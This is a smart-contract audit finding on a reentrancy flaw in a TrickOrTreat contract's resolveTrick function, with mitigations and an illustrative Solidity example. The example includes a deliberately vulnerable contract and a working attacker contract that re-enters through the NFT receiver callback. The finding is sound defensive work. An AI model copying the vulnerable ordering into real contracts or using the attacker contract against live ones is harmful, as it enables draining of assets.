Description: The resolveTrick function transfers the NFT to the caller before it clears the storage that tracks the caller's pending NFT. Because the transfer hands control to the recipient (an NFT safe transfer invokes the receiver's callback, and a contract recipient can run arbitrary code there), a malicious contract can re-enter resolveTrick while its pending entry is still set, i.e. the function follows interactions-before-effects instead of checks-effects-interactions.
Found in src/TrickOrTreat.sol Line: 131
Impact: An attacker contract can call resolveTrick repeatedly from the callback triggered by the NFT transfer. Each re-entrant call still passes the "pending NFT" check because the cleanup has not run yet, so the attacker can manipulate the contract state or obtain more than a single resolution should grant.
Proof of Concept:
Scenario: A malicious contract queues a pending NFT, calls resolveTrick, and re-enters resolveTrick from the callback that the NFT transfer triggers, before the pending-NFT storage is cleared.
Exploit: Because the pending entry is still present on each re-entrant call, the attacker can repeat the resolution step and manipulate contract state or drain resources that should only be released once.
Recommended Mitigation:
Reorder resolveTrick to follow checks-effects-interactions: clear the pending-NFT storage first and only then transfer the NFT (the external call).
Apply a reentrancy guard (for example OpenZeppelin's nonReentrant modifier) to resolveTrick and confirm it is actually present on the function, so that a re-entrant call reverts even if the ordering regresses later.
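The following is an added, self-contained illustration of the ordering problem and the recommended fix; it is hypothetical example code written for this finding, not the TrickOrTreat contract. The contract names (TrickBase, VulnerableTrick, FixedTrick, Reenterer), the pendingNFTs mapping, the queue helper and the resolvedCount counter are all assumptions made for the example; the receiver hook mirrors the ERC721 onERC721Received callback so the transfer calls back into a contract recipient.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical, simplified model of the pattern (not the TrickOrTreat code):
// one NFT queued per caller, resolved by a function that calls back into the
// recipient before clearing the queue entry.

interface IERC721Receiver {
    function onERC721Received(address operator, address from, uint256 tokenId, bytes calldata data)
        external returns (bytes4);
}

abstract contract TrickBase {
    mapping(address => uint256) public pendingNFTs; // tokenId queued for a caller, 0 = nothing pending
    mapping(uint256 => address) public ownerOf;
    uint256 public resolvedCount;                   // how many resolutions completed

    function queue(uint256 tokenId) external {
        require(tokenId != 0, "tokenId 0 reserved");
        pendingNFTs[msg.sender] = tokenId;
    }

    function resolveTrick() external virtual;

    // Mimics an ERC721 safe transfer: a contract recipient is called back,
    // so control leaves this contract here.
    function _safeTransfer(address to, uint256 tokenId) internal {
        ownerOf[tokenId] = to;
        resolvedCount++;
        if (to.code.length > 0) {
            bytes4 ret = IERC721Receiver(to).onERC721Received(msg.sender, address(this), tokenId, "");
            require(ret == IERC721Receiver.onERC721Received.selector, "unsafe receiver");
        }
    }
}

// Vulnerable ordering: interaction (transfer + callback) before the effect (delete).
contract VulnerableTrick is TrickBase {
    function resolveTrick() external override {
        uint256 tokenId = pendingNFTs[msg.sender];
        require(tokenId != 0, "nothing pending");
        _safeTransfer(msg.sender, tokenId); // a re-entrant call still sees pendingNFTs[msg.sender] == tokenId
        delete pendingNFTs[msg.sender];     // cleanup runs too late
    }
}

// Fixed ordering: checks, then effects, then interactions, plus a reentrancy guard.
contract FixedTrick is TrickBase {
    uint256 private locked = 1;

    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    function resolveTrick() external override nonReentrant {
        uint256 tokenId = pendingNFTs[msg.sender];
        require(tokenId != 0, "nothing pending");
        delete pendingNFTs[msg.sender];     // effect first
        _safeTransfer(msg.sender, tokenId); // interaction last
    }
}

// Attacker: re-enters resolveTrick from the receiver hook up to three times.
contract Reenterer is IERC721Receiver {
    TrickBase public immutable target;
    uint256 public depth;            // re-entry attempts made
    uint256 public failedReentries;  // attempts that reverted (expected against FixedTrick)

    constructor(TrickBase _target) { target = _target; }

    function attack(uint256 tokenId) external {
        target.queue(tokenId);
        target.resolveTrick();
    }

    function onERC721Received(address, address, uint256, bytes calldata) external returns (bytes4) {
        if (msg.sender == address(target) && depth < 3) {
            depth++;
            // Against VulnerableTrick this call succeeds because the pending entry is still set;
            // against FixedTrick it reverts (entry already deleted and the guard is held).
            try target.resolveTrick() {} catch { failedReentries++; }
        }
        return IERC721Receiver.onERC721Received.selector;
    }
}
```

Deploying Reenterer against VulnerableTrick and calling attack(7) leaves resolvedCount at 4 for a single queued token: the outer call plus three re-entrant calls, all of which pass the "nothing pending" check. Against FixedTrick the same call leaves resolvedCount at 1 and failedReentries at 1, because the entry is deleted before the transfer and the guard rejects the re-entrant call; note that the guard alone would also stop this, but reordering is the primary fix and the guard is defence in depth.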